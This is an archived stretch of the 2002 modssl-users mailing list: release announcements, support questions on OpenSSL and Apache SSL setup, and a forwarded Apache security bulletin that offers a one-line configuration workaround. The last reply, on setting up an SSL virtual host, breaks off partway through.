  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org
Subject: Re: error while signing the csr
Date: Fri, 9 Aug 2002 13:13:28 +0200
User-Agent: KMail/1.4.1
References: <3D539AC8.BE47D970@free.fr>
In-Reply-To: <3D539AC8.BE47D970@free.fr>
MIME-Version: 1.0
Message-Id: <200208091313.30765.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id NAA05198
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 www.google.com
search: "error 7 at 0 depth lookup:certificate signature failure"

the first is:
http://lists.openna.com/archives-openna-users/2002-February/msg00028.html
not more not less


(RTFM &&  google) or die("i'm too lame, adios");

- -- maumar

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9U6PY4Q/49nIJTlwRAnDHAJ0V7JUqM6MIWlDuNUdXQzSlaBc8HwCff9RH
EgE64xQ3Mbuq7vaLlaY6IMQ=
=MQQ7
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 16:32:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA13541; Fri, 9 Aug 2002 16:31:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id QAA13536; Fri, 9 Aug 2002 16:30:55 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g79ERFSN019373
	for ; Fri, 9 Aug 2002 10:27:15 -0400
Date: Fri, 9 Aug 2002 10:27:15 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache 2.039
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 8 Aug 2002, Cliff Woolley wrote:

> Upgrade to 0.9.6e.

Make that 0.9.6f, released today.  :)

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 16:34:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA13648; Fri, 9 Aug 2002 16:33:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id QAA13606; Fri, 9 Aug 2002 16:32:23 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g79ESiwp019377
	for ; Fri, 9 Aug 2002 10:28:44 -0400
Date: Fri, 9 Aug 2002 10:28:44 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache 2.039
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 9 Aug 2002, Cliff Woolley wrote:

> Make that 0.9.6f, released today.  :)

That's what I get for not reading all of my email before responding to
any of it.  0.9.6g was also released today.  Sigh.  :)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 16:37:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA13772; Fri, 9 Aug 2002 16:36:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.dev.datalogica.com id QAA13739; Fri, 9 Aug 2002 16:35:15 +0200 (MET DST)
Received: from localhost (localhost [[UNIX: localhost]])
	by iris.dev.datalogica.com (8.11.6/8.11.6) id g79EZkQ19811
	for modssl-users@modssl.org; Fri, 9 Aug 2002 14:35:46 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org
Subject: Re: Apache 2.039
Date: Fri, 9 Aug 2002 16:35:42 +0200
User-Agent: KMail/1.4.1
References: 
In-Reply-To: 
MIME-Version: 1.0
Message-Id: <200208091635.45438.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA13766
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Friday 09 August 2002 04:27 pm, Cliff Woolley wrote:
 >On Thu, 8 Aug 2002, Cliff Woolley wrote:
 >> Upgrade to 0.9.6e.
 >
 >Make that 0.9.6f, released today.  :)
 >
 g, just a few minutes ago..
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9U9M/4Q/49nIJTlwRAgh9AJ9RVLUm+8WXtqAkgDNTij/fJnTvdQCfVRko
S0+auy1Me02md2SuHyvmDA4=
=gl4i
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 18:03:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA16586; Fri, 9 Aug 2002 18:02:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sgcmail1.safelite.com id SAA16575; Fri, 9 Aug 2002 18:01:15 +0200 (MET DST)
Received: through eSafe SMTP Relay 1028841482; Fri Aug 09 12:01:07 2002
Received: by sgcmail1.safelite.com with Internet Mail Service (5.5.2650.21)
	id ; Fri, 9 Aug 2002 12:00:40 -0400
Message-ID: 
From: "Xiao, Wei" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache 2.039
Date: Fri, 9 Aug 2002 12:00:40 -0400 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C23FBD.E8CC530E"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Xiao, Wei" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C23FBD.E8CC530E
Content-Type: text/plain

Followed your instruction, finally got every configuration done. But server
won't start with following message in error_log,

[Fri Aug 09 11:49:29 2002] [warn] Init: PRNG still contains not sufficient
entropy!
[Fri Aug 09 11:49:32 2002] [error] Init: Failed to generate temporary 512
bit RSA private key Configuration Failed

Thanks.

-----Original Message-----
From: Daniel Lopez [mailto:daniel@rawbyte.com]
Sent: Thursday, August 08, 2002 2:09 PM
To: modssl-users@modssl.org
Subject: Re: Apache 2.039



Have a look at http://www.apacheworld.org/ty24/site.chapter17.html
That is a chapter I have online that explains step by step how to build
Apache 2 with SSL support. 

> When I run configure --with-ssl=$directory_of_open_ssl, it complained that
> it can't find ssl toolkit library. Did I do anything wrong?
> 
> Thanks.
> 
> Wei
> 
> -----Original Message-----
> From: Cliff Woolley [mailto:jwoolley@apache.org]
> Sent: Thursday, August 08, 2002 1:50 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache 2.039
> 
> 
> On Thu, 8 Aug 2002, Tony Jarriault wrote:
> 
> > I'm search openssl for Apache 2.039, where can i find it, please ?
> 
> I assume you mean mod_ssl, not openssl.  mod_ssl is bundled with Apache
> 2.0.x -- check your copy of Apache 2.0 and you'll find that it's already
> there (caveat: we do not distribute binaries of mod_ssl, only source
> code).
> 
> OpenSSL is the same regardless of what mod_ssl you use and is available at
> www.openssl.org.
> 
> --Cliff
> 
> PS: Can we PLEASE add this to the FAQ or even the main modssl.org site?
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C23FBD.E8CC530E
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






RE: Apache 2.039




Followed your instruction, finally got every configurat=
ion done. But server won't start with following message in error_log,



[Fri Aug 09 11:49:29 2002] [warn] Init: PRNG still cont=
ains not sufficient entropy!

[Fri Aug 09 11:49:32 2002] [error] Init: Failed to gen=
erate temporary 512 bit RSA private key Configuration Failed




Thanks.




-----Original Message-----

From: Daniel Lopez [mailto:daniel@rawbyte.com]

Sent: Thursday, August 08, 2002 2:09 PM

To: modssl-users@modssl.org

Subject: Re: Apache 2.039








Have a look at http://www.apacheworld.org/ty24=
/site.chapter17.html

That is a chapter I have online that explains step by =
step how to build

Apache 2 with SSL support. 




> When I run configure --with-ssl=3D$directory_of_op=
en_ssl, it complained that

> it can't find ssl toolkit library. Did I do anyth=
ing wrong?

> 

> Thanks.

> 

> Wei

> 

> -----Original Message-----

> From: Cliff Woolley [mailto:jwoolley@apache.org]

> Sent: Thursday, August 08, 2002 1:50 PM

> To: modssl-users@modssl.org

> Subject: Re: Apache 2.039

> 

> 

> On Thu, 8 Aug 2002, Tony Jarriault wrote:

> 

> > I'm search openssl for Apache 2.039, where c=
an i find it, please ?

> 

> I assume you mean mod_ssl, not openssl.  mod=
_ssl is bundled with Apache

> 2.0.x -- check your copy of Apache 2.0 and you'll=
 find that it's already

> there (caveat: we do not distribute binaries of m=
od_ssl, only source

> code).

> 

> OpenSSL is the same regardless of what mod_ssl yo=
u use and is available at

> www.openssl.org.

> 

> --Cliff

> 

> PS: Can we PLEASE add this to the FAQ or even the=
 main modssl.org site?

> 

> _________________________________________________=
_____________________

> Apache Interface to OpenSSL (mod_ssl)  =
            &=
nbsp;    www.modssl.org

> User Support Mailing List    =
            &=
nbsp;     modssl-users@modssl.org

> Automated List Manager    &nb=
sp;           &nbs=
p;           majordomo@=
modssl.org

______________________________________________________=
________________

Apache Interface to OpenSSL (mod_ssl)   =
;            =
    www.modssl.org

User Support Mailing List     =
;            =
     modssl-users@modssl.org

Automated List Manager     &n=
bsp;           &nb=
sp;          majordomo@modss=
l.org





------_=_NextPart_001_01C23FBD.E8CC530E--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug  9 23:52:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA26834; Fri, 9 Aug 2002 23:51:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id XAA26830; Fri, 9 Aug 2002 23:51:07 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g79LlD12020183
	for ; Fri, 9 Aug 2002 17:47:14 -0400
Date: Fri, 9 Aug 2002 17:47:13 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache 2.039
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 9 Aug 2002, Cliff Woolley wrote:

> That's what I get for not reading all of my email before responding to
> any of it.  0.9.6g was also released today.  Sigh.  :)

I guess today was the day for releases.  Apache 2.0.40 is now out as well.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 10 00:53:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA29985; Sat, 10 Aug 2002 00:52:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id AAA29979; Sat, 10 Aug 2002 00:52:10 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id SAA29345
	for ; Fri, 9 Aug 2002 18:55:02 -0400
Date: Fri, 9 Aug 2002 18:55:01 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: Apache 2.039
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 9 Aug 2002, Cliff Woolley wrote:

> On Fri, 9 Aug 2002, Cliff Woolley wrote:
> 
> > That's what I get for not reading all of my email before responding to
> > any of it.  0.9.6g was also released today.  Sigh.  :)
> 
> I guess today was the day for releases.  Apache 2.0.40 is now out as well.

Any word on if this compiles on those older linux kernels as the previous
release was a total dud in that realm?

Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 10 01:09:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA00730; Sat, 10 Aug 2002 01:08:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id BAA00726; Sat, 10 Aug 2002 01:07:45 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id TAA29431;
	Fri, 9 Aug 2002 19:10:47 -0400
Date: Fri, 9 Aug 2002 19:10:47 -0400 (EDT)
From: "R. DuFresne" 
To: Cliff Woolley 
cc: modssl-users@modssl.org
Subject: Re: Apache 2.039
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


This is a security fix release for those using apache in Cygwin
environments!



Date: Fri, 9 Aug 2002 22:07:52 +0100 (BST)
From: Mark J Cox 
To: bugtraq@securityfocus.com,
     Full Disclosure ,
     Vuln-Dev 
Subject: [Full-Disclosure] Apache 2.0 vulnerability affects non-Unix
    platforms

-----BEGIN PGP SIGNED MESSAGE-----

For Immediate Disclosure

=============== SUMMARY ================

        Title: Apache 2.0 vulnerability affects non-Unix platforms
         Date: 9th August 2002
     Revision: 2
 Product Name: Apache HTTP server 2.0
  OS/Platform: Windows, OS2, Netware
Permanent URL:
http://httpd.apache.org/info/security_bulletin_20020809a.txt
  Vendor Name: Apache Software Foundation
   Vendor URL: http://httpd.apache.org/
      Affects: All Released versions of 2.0 through 2.0.39
     Fixed in: 2.0.40
  Identifiers: CAN-2002-0661

=============== DESCRIPTION ================
Apache is a powerful, full-featured, efficient, and freely-available Web
server.  On the 7th August 2002, The Apache Software Foundation was
notified of the discovery of a significant vulnerability, identified by
Auriemma Luigi .

This vulnerability has the potential to allow an attacker to inflict
serious damage to a server, and reveal sensitive data.  This vulnerability
affects default installations of the Apache web server.

Unix and other variant platforms appear unaffected.  Cygwin users are
likely to be affected.

=============== SOLUTION ================

A simple one line workaround in the httpd.conf file will close the
vulnerability.  Prior to the first 'Alias' or 'Redirect' directive, add
the following directive to the global server configuration:

   RedirectMatch 400 "\\\.\."

Fixes for this vulnerability are also included in Apache HTTP server
version 2.0.40.  The 2.0.40 release also contains fixes for two minor
path-revealing exposures.  This release of Apache is available at
http://www.apache.org/dist/httpd/



Thanks,

Ron DuFresne

On Fri, 9 Aug 2002, Cliff Woolley wrote:

> On Fri, 9 Aug 2002, Cliff Woolley wrote:
> 
> > That's what I get for not reading all of my email before responding to
> > any of it.  0.9.6g was also released today.  Sigh.  :)
> 
> I guess today was the day for releases.  Apache 2.0.40 is now out as well.
> 
> --Cliff
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 10 05:07:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA07187; Sat, 10 Aug 2002 05:06:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.virginia.edu id FAA07156; Sat, 10 Aug 2002 05:05:39 +0200 (MET DST)
Received: from node16.unix.virginia.edu by mail.virginia.edu id ab24956;
          9 Aug 2002 23:05 EDT
Received: from localhost (jcw5q@localhost)
	by node16.unix.Virginia.EDU (8.9.3/8.9.3) with ESMTP id XAA66168
	for ; Fri, 9 Aug 2002 23:05:36 -0400
X-Authentication-Warning: node16.unix.Virginia.EDU: jcw5q owned process doing -bs
Date: Fri, 9 Aug 2002 23:05:36 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender:  
To: modssl-users@modssl.org
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
Subject: Re: Apache 2.039
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 9 Aug 2002, R. DuFresne wrote:

> Any word on if this compiles on those older linux kernels as the previous
> release was a total dud in that realm?

Probably no change.  But FWIW, I believe one of our developers tried it on
an older kernel and it worked fine for him....... if you could provide
access to a box it fails on to one of the core dev team, that might help.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 10 11:26:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA13358; Sat, 10 Aug 2002 11:25:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id LAA13354; Sat, 10 Aug 2002 11:24:55 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id 39BA6BD2E; Sat, 10 Aug 2002 11:24:58 +0200 (CEST)
Date: Sat, 10 Aug 2002 11:24:58 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Apache 2.039
Message-ID: <20020810092458.GA20859@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Aug 09, 2002 at 06:55:01PM -0400, R. DuFresne wrote:
> Any word on if this compiles on those older linux kernels as the previous
> release was a total dud in that realm?

I've compiled Apache2 on a 2.0 linux kernel several times without problems.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 10 11:33:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA13540; Sat, 10 Aug 2002 11:32:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id LAA13536; Sat, 10 Aug 2002 11:31:41 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id FAA31257;
	Sat, 10 Aug 2002 05:34:45 -0400
Date: Sat, 10 Aug 2002 05:34:44 -0400 (EDT)
From: "R. DuFresne" 
To: Mads Toftum 
cc: modssl-users@modssl.org
Subject: Re: Apache 2.039
In-Reply-To: <20020810092458.GA20859@marvin-lnx.staff.tdk.net>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, 10 Aug 2002, Mads Toftum wrote:

> On Fri, Aug 09, 2002 at 06:55:01PM -0400, R. DuFresne wrote:
> > Any word on if this compiles on those older linux kernels as the previous
> > release was a total dud in that realm?
> 
> I've compiled Apache2 on a 2.0 linux kernel several times without problems.

yes, but, on an older linux kernel?  Pre 2.2.x?

Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 13 07:04:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA08254; Tue, 13 Aug 2002 07:03:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id HAA08246; Tue, 13 Aug 2002 07:02:31 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E228F4CE638; Tue, 13 Aug 2002 07:02:30 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B2F1828846; Tue, 13 Aug 2002 07:02:25 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.unboundtech.com id WAA25693; Mon, 12 Aug 2002 22:02:34 +0200 (MET DST)
Received: from unboundtech.com (blffstn-217.aus.tx.bbnow.net [24.219.67.217])
	by mail.unboundtech.com (Postfix) with ESMTP id 14A905E6E6
	for ; Mon, 12 Aug 2002 15:04:04 -0500 (CDT)
Message-ID: <3D58141F.8020603@unboundtech.com>
Date: Mon, 12 Aug 2002 15:01:35 -0500
From: Justin Georgeson 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: enabling ssl for a subdirectory of a vhost
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Justin Georgeson 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have Apache 1.3.17 with mod_ssl. I'm not a real proficient apache 
admin just yet, so forgive my if I unintentionally omit some crucial 
point, or use the wrong nomenclature. :) I have a vhost which I would 
like to add an SSL enabled subdirectory to.

http://my.host.com/dir1
https://my.host.com/dir2

Maybe even have http://my.host.com/dir2 redirect to 
https://my.host.com/dir2. But I have no clue how to do it. I tried 
adding the SSL directives to the , but that totally didn't 
work. (apache wouldn't start), but moving the directives outside of that 
made the whole vhost SSL, and screwed up other things that it's already 
doing.

-- 
Justin Georgeson
UnBound Technologies, Inc.
http://www.unboundtech.com
Main   713.329.9330
Fax    713.460.4051
Mobile 512.789.1962

5295 Hollister Road
Houston, TX 77040
Real Applications using Real Wireless Intelligence(tm)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 13 09:46:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA14645; Tue, 13 Aug 2002 09:45:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id JAA14585; Tue, 13 Aug 2002 09:44:37 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id JAA01759
	for ; Tue, 13 Aug 2002 09:44:36 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA28056
	for ; Tue, 13 Aug 2002 09:44:36 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: enabling ssl for a subdirectory of a vhost
Date: Tue, 13 Aug 2002 09:44:35 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8C2C@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: enabling ssl for a subdirectory of a vhost
Thread-Index: AcJChwwPkrTiSxAXQXWflX6iMzbLsgAEiTQQ
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAB14637
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From: Justin Georgeson [mailto:jgeorgeson@unboundtech.com]
>
>I have Apache 1.3.17 with mod_ssl. I'm not a real proficient apache 
>admin just yet, so forgive my if I unintentionally omit some crucial 
>point, or use the wrong nomenclature. :) I have a vhost which I would 
>like to add an SSL enabled subdirectory to.
>
>http://my.host.com/dir1
>https://my.host.com/dir2
>
>Maybe even have http://my.host.com/dir2 redirect to 
>https://my.host.com/dir2. But I have no clue how to do it. I tried 
>adding the SSL directives to the , but that totally didn't 
>work. (apache wouldn't start), but moving the directives 
>outside of that made the whole vhost SSL, and screwed up other things
>that it's already doing.

Congratulations, you've already done the hard part of installing mod_ssl and getting it running with certs and so on. All you need now is to set up your configuration and that is easy once you get the hang of it.

The main thing to realise is that HTTPS requests come in on a different port (usually 443) from normal HTTP traffic which uses port 80. Therefore, the simplest thing to do is to create a new port-based virtual host for SSL stuff. Indeed, most SSL directives only work in a virtualhost context (i.e. you can't make them apply in a directory context).

Rather than having an SSL subdirectory of your main site, I would recommend you create a separate SSL VH. Start off with the simplest implementation which is something like this:

# Define the normal HTTP service on port 80


  DocumentRoot /home/www/html
